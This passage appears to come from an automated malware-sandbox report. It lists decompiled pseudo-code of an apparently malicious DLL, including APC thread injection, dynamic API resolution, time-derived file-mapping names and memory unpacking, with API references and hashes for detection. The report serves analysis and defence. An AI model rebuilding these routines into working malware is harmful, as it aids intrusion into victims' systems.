								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x6ddb4240 = 1;
							__eflags =  *0x6ddb4240;
							if( *0x6ddb4240 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x6ddb4200 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x6ddb4200 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x6ddb4240 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x6ddb4200 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t58 = _t81 - 1;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x6ddb41f8 = _t81;
								}
								_t58 = _t81 - 1;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x6ddb4200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6ddb4200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x6ddb248f
0x6ddb2492
0x6ddb2498
0x6ddb24b6
0x00000000
0x6ddb24b6
0x6ddb24a0
0x6ddb24a9
0x6ddb24af
0x6ddb24be
0x6ddb24c1
0x6ddb24c4
0x6ddb24ce
0x6ddb24ce
0x6ddb24d0
0x6ddb24d3
0x6ddb24d5
0x6ddb24d5
0x6ddb24d7
0x6ddb24da
0x00000000
0x00000000
0x6ddb24dc
0x6ddb24de
0x6ddb2544
0x6ddb2544
0x6ddb26a2
0x00000000
0x6ddb26a2
0x6ddb24e0
0x6ddb24e0
0x6ddb24e4
0x6ddb24e6
0x6ddb24e6
0x6ddb24e6
0x6ddb24e6
0x6ddb24e9
0x6ddb24ea
0x6ddb24ed
0x6ddb24ed
0x6ddb24f1
0x6ddb24f5
0x6ddb2503
0x6ddb2503
0x6ddb250b
0x6ddb2511
0x6ddb2513
0x6ddb2515
0x6ddb2525
0x6ddb2532
0x6ddb2536
0x6ddb253b
0x6ddb253d
0x6ddb25bb
0x6ddb25bb
0x6ddb253f
0x6ddb253f
0x6ddb253f
0x6ddb25bd
0x6ddb25bf
0x6ddb26a0
0x6ddb26a0
0x00000000
0x6ddb25c5
0x6ddb25c5
0x6ddb25cc
0x00000000
0x00000000
0x6ddb25d2
0x6ddb25d6
0x6ddb2632
0x6ddb2634
0x6ddb263c
0x6ddb263e
0x6ddb2640
0x00000000
0x00000000
0x6ddb2642
0x6ddb2648
0x6ddb264a
0x6ddb264c
0x6ddb2661
0x6ddb2661
0x6ddb2663
0x6ddb2692
0x6ddb2699
0x00000000
0x6ddb2699
0x6ddb2667
0x6ddb2668
0x6ddb266a
0x6ddb266c
0x6ddb266c
0x6ddb266e
0x6ddb2670
0x6ddb2672
0x6ddb2686
0x6ddb2686
0x6ddb2689
0x6ddb268b
0x6ddb268b
0x6ddb268c
0x6ddb268c
0x00000000
0x6ddb2674
0x6ddb2674
0x6ddb2674
0x6ddb267d
0x6ddb267e
0x6ddb2680
0x6ddb2682
0x6ddb2682
0x00000000
0x6ddb2674
0x6ddb2672
0x6ddb264e
0x6ddb2655
0x6ddb2655
0x6ddb2657
0x00000000
0x00000000
0x6ddb2659
0x6ddb265a
0x6ddb265d
0x6ddb265f
0x00000000
0x00000000
0x00000000
0x6ddb265f
0x00000000
0x6ddb2655
0x6ddb25d8
0x6ddb25db
0x6ddb25e0
0x00000000
0x00000000
0x6ddb25e9
0x6ddb25eb
0x6ddb25f1
0x00000000
0x00000000
0x6ddb25f7
0x6ddb25fd
0x00000000
0x00000000
0x6ddb2603
0x6ddb2605
0x6ddb260e
0x6ddb2612
0x00000000
0x00000000
0x6ddb2618
0x6ddb261b
0x6ddb261d
0x00000000
0x00000000
0x6ddb2624
0x6ddb2626
0x00000000
0x00000000
0x6ddb2628
0x6ddb262c
0x00000000
0x00000000
0x00000000
0x6ddb262c
0x00000000
0x00000000
0x00000000
0x6ddb2517
0x6ddb2517
0x6ddb2517
0x6ddb251e
0x00000000
0x00000000
0x6ddb2520
0x6ddb2521
0x6ddb2523
0x00000000
0x00000000
0x00000000
0x6ddb2523
0x6ddb254b
0x6ddb254d
0x00000000
0x00000000
0x6ddb255d
0x6ddb255f
0x6ddb2561
0x00000000
0x00000000
0x6ddb2567
0x6ddb256e
0x6ddb259a
0x6ddb259a
0x6ddb259c
0x6ddb259e
0x6ddb25b2
0x6ddb25b4
0x00000000
0x00000000
0x00000000
0x00000000
0x6ddb25a0
0x6ddb25a0
0x6ddb25a0
0x6ddb25a9
0x6ddb25aa
0x6ddb25ac
0x6ddb25ae
0x6ddb25ae
0x00000000
0x6ddb25a0
0x6ddb2570
0x6ddb2573
0x6ddb2575
0x6ddb2587
0x6ddb2587
0x6ddb258a
0x6ddb258c
0x6ddb258c
0x6ddb258d
0x6ddb258d
0x6ddb2593
0x00000000
0x00000000
0x00000000
0x00000000
0x6ddb2577
0x6ddb2577
0x6ddb2577
0x6ddb257e
0x00000000
0x00000000
0x6ddb2580
0x6ddb2580
0x6ddb2581
0x00000000
0x00000000
0x00000000
0x6ddb2581
0x6ddb2583
0x6ddb2585
0x6ddb2598
0x00000000
0x00000000
0x00000000
0x6ddb2598
0x00000000
0x6ddb2585
0x6ddb24f7
0x6ddb24fa
0x6ddb24fd
0x00000000
0x00000000
0x6ddb24ff
0x6ddb2501
0x00000000
0x00000000
0x00000000
0x6ddb2501
0x6ddb24c6
0x6ddb24c8
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 6DDB2536

Memory Dump Source

Source File: 00000003.00000002.619761789.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000003.00000002.619443639.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.620321006.000000006DDB3000.00000002.00020000.sdmp Download File

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: dbc80cf6188c3910675029e045aae184d6c322e003f3bfd624aea70238b445f7
Instruction ID: 5405c78088d3da40e6eb858b4ad62ad246fdb8b299c4570ea4b22369cbbe7cce
Opcode Fuzzy Hash: dbc80cf6188c3910675029e045aae184d6c322e003f3bfd624aea70238b445f7
Instruction Fuzzy Hash: 2061D8F2A04503CFDB29EF28C8A07697BF5AB9A35CF208039F557C7295E730D8428650

Uniqueness

Uniqueness Score: -1.00%

Function 6DDB17A7, Relevance: 15.1, APIs: 10, Instructions: 103
threadsleepsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E6DDB17A7(intOrPtr _a4) {
				char _v28;
				struct _SYSTEMTIME _v44;
				char _v48;
				long _v52;
				long _v56;
				void* __edi;
				long _t21;
				int _t23;
				long _t27;
				long _t31;
				intOrPtr _t39;
				intOrPtr _t44;
				signed int _t45;
				void* _t50;
				signed int _t54;
				void* _t56;
				intOrPtr* _t57;

				_t21 = E6DDB146C();
				_v52 = _t21;
				if(_t21 != 0) {
					L18:
					return _t21;
				} else {
					goto L1;
				}
				do {
					L1:
					GetSystemTime( &_v44);
					_t23 = SwitchToThread();
					asm("cdq");
					_t45 = 9;
					_t54 = _t23 + (_v44.wMilliseconds & 0x0000ffff) % _t45;
					_v56 = E6DDB15A3(0, _t54);
					Sleep(_t54 << 5);
					_t21 = _v56;
				} while (_t21 == 0xc);
				if(_t21 != 0) {
					goto L18;
				}
				_t27 = E6DDB1C12(_t45);
				_v52 = _t27;
				if(_t27 != 0) {
					L16:
					_t21 = _v52;
					if(_t21 == 0xffffffff) {
						_t21 = GetLastError();
					}
					goto L18;
				}
				if(_a4 != 0) {
					L11:
					_push(0);
					_t56 = E6DDB1CA4(E6DDB16EC,  &_v28);
					if(_t56 == 0) {
						_v56 = GetLastError();
					} else {
						_t31 = WaitForSingleObject(_t56, 0xffffffff);
						_v56 = _t31;
						if(_t31 == 0) {
							GetExitCodeThread(_t56,  &_v56);
						}
						CloseHandle(_t56);
					}
					goto L16;
				}
				if(E6DDB1D7C(_t45,  &_v48) != 0) {
					 *0x6ddb41b8 = 0;
					goto L11;
				}
				_t44 = _v48;
				_t57 = __imp__GetLongPathNameW;
				_t50 =  *_t57(_t44, 0, 0);
				if(_t50 == 0) {
					L9:
					 *0x6ddb41b8 = _t44;
					goto L11;
				}
				_t15 = _t50 + 2; // 0x2
				_t39 = E6DDB1C8F(_t50 + _t15);
				 *0x6ddb41b8 = _t39;
				if(_t39 == 0) {
					goto L9;
				} else {
					 *_t57(_t44, _t39, _t50);
					E6DDB136A(_t44);
					goto L11;
				}
			}

0x6ddb17b3
0x6ddb17bc
0x6ddb17c0
0x6ddb18c8
0x6ddb18ce
0x00000000
0x00000000
0x00000000
0x6ddb17c6
0x6ddb17c6
0x6ddb17cb
0x6ddb17d1
0x6ddb17e0
0x6ddb17e1
0x6ddb17e4
0x6ddb17f0
0x6ddb17f4
0x6ddb17fa
0x6ddb17fe
0x6ddb1805
0x00000000
0x00000000
0x6ddb180b
0x6ddb1812
0x6ddb1816
0x6ddb18b9
0x6ddb18b9
0x6ddb18c0
0x6ddb18c2
0x6ddb18c2
0x00000000
0x6ddb18c0
0x6ddb181f
0x6ddb1872
0x6ddb1872
0x6ddb1883
0x6ddb1887
0x6ddb18b5
0x6ddb1889
0x6ddb188c
0x6ddb1894
0x6ddb1898
0x6ddb18a0
0x6ddb18a0
0x6ddb18a7
0x6ddb18a7
0x00000000
0x6ddb1887
0x6ddb182d
0x6ddb186c
0x00000000
0x6ddb186c
0x6ddb182f
0x6ddb1833
0x6ddb183e
0x6ddb1842
0x6ddb1864
0x6ddb1864
0x00000000
0x6ddb1864
0x6ddb1844
0x6ddb1849
0x6ddb1850
0x6ddb1855
0x00000000
0x6ddb1857
0x6ddb185a
0x6ddb185d
0x00000000
0x6ddb185d

APIs

Part of subcall function 6DDB146C: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6DDB17B8,751463F0,00000000), ref: 6DDB147B
Part of subcall function 6DDB146C: GetVersion.KERNEL32 ref: 6DDB148A
Part of subcall function 6DDB146C: GetCurrentProcessId.KERNEL32 ref: 6DDB1499
Part of subcall function 6DDB146C: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6DDB14B2

GetSystemTime.KERNEL32(?,751463F0,00000000), ref: 6DDB17CB
SwitchToThread.KERNEL32 ref: 6DDB17D1

Part of subcall function 6DDB15A3: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?,00000000,00000000), ref: 6DDB15F9
Part of subcall function 6DDB15A3: memcpy.NTDLL(?,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,6DDB17EC), ref: 6DDB168B
Part of subcall function 6DDB15A3: VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,00000000), ref: 6DDB16A6

Sleep.KERNEL32(00000000,00000000), ref: 6DDB17F4
GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 6DDB183C
GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 6DDB185A
WaitForSingleObject.KERNEL32(00000000,000000FF,6DDB16EC,?,00000000), ref: 6DDB188C
GetExitCodeThread.KERNEL32(00000000,?), ref: 6DDB18A0
CloseHandle.KERNEL32(00000000), ref: 6DDB18A7
GetLastError.KERNEL32(6DDB16EC,?,00000000), ref: 6DDB18AF
GetLastError.KERNEL32 ref: 6DDB18C2

Memory Dump Source

Source File: 00000003.00000002.619761789.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000003.00000002.619443639.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.620321006.000000006DDB3000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastLongNamePathProcessThreadVirtual$AllocCloseCodeCreateCurrentEventExitFreeHandleObjectOpenSingleSleepSwitchSystemTimeVersionWaitmemcpy
String ID:
API String ID: 2280543912-0
Opcode ID: 519507a987008ef3d5a67cc4db1f0a074a3fc8a2a9e81967e4e747b139d2386d
Instruction ID: 4bc904ff59cb44ee5c2c77c15784d84976087d6f449b0c3fc4d275b3d0c97cf9
Opcode Fuzzy Hash: 519507a987008ef3d5a67cc4db1f0a074a3fc8a2a9e81967e4e747b139d2386d
Instruction Fuzzy Hash: 693150F5848B12EBD711FF658844A6F77FCFE8A65CB110A1AF5A6C2141EB30C50496B2

Uniqueness

Uniqueness Score: -1.00%

Function 6DDB1979, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E6DDB1979(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L6DDB2210();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x6ddb41d0;
				_push(_t15 + 0x6ddb505e);
				_push(_t15 + 0x6ddb5054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L6DDB220A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t34 = CreateFileMappingW(0xffffffff, 0x6ddb41c0, 4, 0, _t18,  &_v60);
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0);
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

0x6ddb1979
0x6ddb1982
0x6ddb1986
0x6ddb198c
0x6ddb1991
0x6ddb1996
0x6ddb1999
0x6ddb199c
0x6ddb19a1
0x6ddb19a2
0x6ddb19a5
0x6ddb19b0
0x6ddb19b7
0x6ddb19bb
0x6ddb19bd
0x6ddb19be
0x6ddb19c1
0x6ddb19c6
0x6ddb19d0
0x6ddb19d2
0x6ddb19d2
0x6ddb19ec
0x6ddb19f0
0x6ddb1a40
0x6ddb19f2
0x6ddb19fb
0x6ddb1a11
0x6ddb1a19
0x6ddb1a2b
0x6ddb1a2f
0x00000000
0x00000000
0x6ddb1a1b
0x6ddb1a1e
0x6ddb1a23
0x6ddb1a25
0x6ddb1a25
0x6ddb1a06
0x6ddb1a08
0x6ddb1a31
0x6ddb1a32
0x6ddb1a32
0x6ddb19fb
0x6ddb1a48

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,6DDB176E,0000000A,?,?), ref: 6DDB1986
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6DDB199C
_snwprintf.NTDLL ref: 6DDB19C1
CreateFileMappingW.KERNEL32(000000FF,6DDB41C0,00000004,00000000,?,?), ref: 6DDB19E6
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6DDB176E,0000000A,?), ref: 6DDB19FD
MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 6DDB1A11
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6DDB176E,0000000A,?), ref: 6DDB1A29
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6DDB176E,0000000A), ref: 6DDB1A32
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6DDB176E,0000000A,?), ref: 6DDB1A3A

Memory Dump Source

Source File: 00000003.00000002.619761789.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000003.00000002.619443639.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.620321006.000000006DDB3000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1724014008-0
Opcode ID: e49ed31925bd01063bc5d047e598b5764dcd4025c89723ce229b0327dc608422
Instruction ID: 1c7540bb37167e20d750e256c70e862796965cfc3ea98787bb3f950ed7813371
Opcode Fuzzy Hash: e49ed31925bd01063bc5d047e598b5764dcd4025c89723ce229b0327dc608422
Instruction Fuzzy Hash: BB218EF2540109FBEB21BF98DC85FAE7BB8EB4935CF118025F652D6181D63069458B60

Uniqueness

Uniqueness Score: -1.00%

Function 6DDB1AA5, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6DDB1AA5(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E6DDB1C8F(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x6ddb41d0 + 0x6ddb5014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x6ddb41d0 + 0x6ddb50e1);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E6DDB136A(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x6ddb41d0 + 0x6ddb50f1);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x6ddb41d0 + 0x6ddb5104);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x6ddb41d0 + 0x6ddb5119);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x6ddb41d0 + 0x6ddb512f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E6DDB18D1(_t56, _a12);
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x6ddb1ab3
0x6ddb1ab7
0x6ddb1b78
0x6ddb1abd
0x6ddb1ad5
0x6ddb1ae4
0x6ddb1aeb
0x6ddb1aef
0x6ddb1af2
0x6ddb1b70
0x6ddb1b71
0x6ddb1af4
0x6ddb1b01
0x6ddb1b05
0x6ddb1b08
0x00000000
0x6ddb1b0a
0x6ddb1b17
0x6ddb1b1b
0x6ddb1b1e
0x00000000
0x6ddb1b20
0x6ddb1b2d
0x6ddb1b31
0x6ddb1b34
0x00000000
0x6ddb1b36
0x6ddb1b43
0x6ddb1b47
0x6ddb1b4a
0x00000000
0x6ddb1b4c
0x6ddb1b52
0x6ddb1b58
0x6ddb1b5d
0x6ddb1b64
0x6ddb1b67
0x00000000
0x6ddb1b69
0x6ddb1b6c
0x6ddb1b6c
0x6ddb1b67
0x6ddb1b4a
0x6ddb1b34
0x6ddb1b1e
0x6ddb1b08
0x6ddb1af2
0x6ddb1b86

APIs

Part of subcall function 6DDB1C8F: HeapAlloc.KERNEL32(00000000,?,6DDB117D,?,00000000,00000000,?,?,?,6DDB1810), ref: 6DDB1C9B

GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,6DDB1272,?,?,?,?), ref: 6DDB1AC9
GetProcAddress.KERNEL32(00000000,?), ref: 6DDB1AEB
GetProcAddress.KERNEL32(00000000,?), ref: 6DDB1B01
GetProcAddress.KERNEL32(00000000,?), ref: 6DDB1B17
GetProcAddress.KERNEL32(00000000,?), ref: 6DDB1B2D
GetProcAddress.KERNEL32(00000000,?), ref: 6DDB1B43

Part of subcall function 6DDB18D1: memset.NTDLL ref: 6DDB1950

Memory Dump Source

Source File: 00000003.00000002.619761789.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000003.00000002.619443639.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.620321006.000000006DDB3000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocHandleHeapModulememset
String ID:
API String ID: 426539879-0
Opcode ID: a60fee01259e5fef33129940f5522b37c59ea9c60b09f9946a422ba2cae12f07
Instruction ID: 647983da1d0fee420c2e125e34a4605c40841476c72495543c04e282f0074f13
Opcode Fuzzy Hash: a60fee01259e5fef33129940f5522b37c59ea9c60b09f9946a422ba2cae12f07
Instruction Fuzzy Hash: 3D21BBF190060AEFEB50FF69C880E6A77FCEB0A68CB014515B95AC7211E730E9058FA4

Uniqueness

Uniqueness Score: -1.00%

Function 6DDB1E04, Relevance: 9.1, APIs: 6, Instructions: 71
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x6ddb4188);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x6ddb418c;
						if( *0x6ddb418c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x6ddb4198;
								if( *0x6ddb4198 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x6ddb418c);
						}
						HeapDestroy( *0x6ddb4190);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x6ddb4188) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0);
						_t41 = _t18;
						 *0x6ddb4190 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x6ddb41b0 = _a4;
							asm("lock xadd [eax], edi");
							_push( &_a8);
							_t23 = E6DDB1CA4(E6DDB1D32, E6DDB1EE0(_a12, 1, 0x6ddb4198, _t41));
							 *0x6ddb418c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}

0x6ddb1e07
0x6ddb1e13
0x6ddb1e15
0x6ddb1e18
0x6ddb1e8e
0x6ddb1e94
0x6ddb1e96
0x6ddb1e98
0x6ddb1e9e
0x6ddb1ea0
0x6ddb1ea5
0x6ddb1ea8
0x6ddb1eb3
0x6ddb1eb5
0x00000000
0x00000000
0x6ddb1eb7
0x6ddb1eba
0x6ddb1ebc
0x00000000
0x00000000
0x00000000
0x6ddb1ebc
0x6ddb1ec4
0x6ddb1ec4
0x6ddb1ed0
0x6ddb1ed0
0x6ddb1e1a
0x6ddb1e1b
0x6ddb1e3b
0x6ddb1e41
0x6ddb1e43
0x6ddb1e48
0x6ddb1e84
0x6ddb1e84
0x6ddb1e4a
0x6ddb1e52
0x6ddb1e59
0x6ddb1e63
0x6ddb1e6f
0x6ddb1e76
0x6ddb1e7b
0x6ddb1e80
0x00000000
0x6ddb1e80
0x6ddb1e7b
0x6ddb1e48
0x6ddb1e1b
0x6ddb1edd

APIs

InterlockedIncrement.KERNEL32(6DDB4188), ref: 6DDB1E26
HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 6DDB1E3B

Part of subcall function 6DDB1CA4: CreateThread.KERNEL32 ref: 6DDB1CBB
Part of subcall function 6DDB1CA4: QueueUserAPC.KERNEL32(?,00000000,?), ref: 6DDB1CD0
Part of subcall function 6DDB1CA4: GetLastError.KERNEL32(00000000), ref: 6DDB1CDB
Part of subcall function 6DDB1CA4: TerminateThread.KERNEL32(00000000,00000000), ref: 6DDB1CE5
Part of subcall function 6DDB1CA4: CloseHandle.KERNEL32(00000000), ref: 6DDB1CEC
Part of subcall function 6DDB1CA4: SetLastError.KERNEL32(00000000), ref: 6DDB1CF5

InterlockedDecrement.KERNEL32(6DDB4188), ref: 6DDB1E8E
SleepEx.KERNEL32(00000064,00000001), ref: 6DDB1EA8
CloseHandle.KERNEL32 ref: 6DDB1EC4
HeapDestroy.KERNEL32 ref: 6DDB1ED0

Memory Dump Source

Source File: 00000003.00000002.619761789.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000003.00000002.619443639.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.620321006.000000006DDB3000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
String ID:
API String ID: 2110400756-0
Opcode ID: 2eb69512f554691503bfdd49e44b2706f024192bbda4fa08aec9b146ea24d759
Instruction ID: 9a10dd5b3c996a88b563ae964d06f3b4f2bd5cbb45750744f9773ea2e2415a63
Opcode Fuzzy Hash: 2eb69512f554691503bfdd49e44b2706f024192bbda4fa08aec9b146ea24d759
Instruction Fuzzy Hash: 1C2159F1E44206EBEF00FFEACC84B6A7BB8FB5A7AD7114129F556D2141E73099049B60

Uniqueness

Uniqueness Score: -1.00%

Function 6DDB1CA4, Relevance: 9.0, APIs: 6, Instructions: 32
threadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6DDB1CA4(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				long _t11;
				void* _t13;

				_t13 = CreateThread(0, 0, __imp__SleepEx,  *0x6ddb41cc, 0, _a12);
				if(_t13 != 0 && QueueUserAPC(_v0, _t13, _a4) == 0) {
					_t11 = GetLastError();
					TerminateThread(_t13, _t11);
					CloseHandle(_t13);
					_t13 = 0;
					SetLastError(_t11);
				}
				return _t13;
			}

0x6ddb1cc1
0x6ddb1cc5
0x6ddb1ce1
0x6ddb1ce5
0x6ddb1cec
0x6ddb1cf3
0x6ddb1cf5
0x6ddb1cfb
0x6ddb1cff

APIs

CreateThread.KERNEL32 ref: 6DDB1CBB
QueueUserAPC.KERNEL32(?,00000000,?), ref: 6DDB1CD0
GetLastError.KERNEL32(00000000), ref: 6DDB1CDB
TerminateThread.KERNEL32(00000000,00000000), ref: 6DDB1CE5
CloseHandle.KERNEL32(00000000), ref: 6DDB1CEC
SetLastError.KERNEL32(00000000), ref: 6DDB1CF5

Memory Dump Source

Source File: 00000003.00000002.619761789.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000003.00000002.619443639.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.620321006.000000006DDB3000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
String ID:
API String ID: 3832013932-0
Opcode ID: 9cbffa980a82652924a7f5f0ce5892cdbfe141dc5290f30efd40b9d1495c7191
Instruction ID: 2b6ffdeffc9900ab8e020c8ea2f62b0329db559f9c1474979b3221a3281132a5
Opcode Fuzzy Hash: 9cbffa980a82652924a7f5f0ce5892cdbfe141dc5290f30efd40b9d1495c7191
Instruction Fuzzy Hash: FFF082B2684621FBEB117FA48C0CF5BBF78FF0A759F000504F68591141C7318811AB95

Uniqueness

Uniqueness Score: -1.00%

Function 6DDB15A3, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E6DDB15A3(void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				unsigned int _v12;
				intOrPtr _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v36;
				signed int _v44;
				signed int _v48;
				intOrPtr _t39;
				void* _t46;
				intOrPtr _t47;
				intOrPtr _t50;
				signed int _t59;
				signed int _t61;
				intOrPtr _t66;
				intOrPtr _t77;
				void* _t78;
				signed int _t80;

				_t77 =  *0x6ddb41b0;
				_t39 = E6DDB1A4B(_t77,  &_v20,  &_v12);
				_v16 = _t39;
				if(_t39 == 0) {
					asm("sbb ebx, ebx");
					_t59 =  ~( ~(_v12 & 0x00000fff)) + (_v12 >> 0xc);
					_t78 = _t77 + _v20;
					_v36 = _t78;
					_t46 = VirtualAlloc(0, _t59 << 0xc, 0x3000, 4);
					_v24 = _t46;
					if(_t46 == 0) {
						_v16 = 8;
					} else {
						_t61 = 0;
						if(_t59 <= 0) {
							_t47 =  *0x6ddb41cc;
						} else {
							_t66 = _a4;
							_t50 = _t46 - _t78;
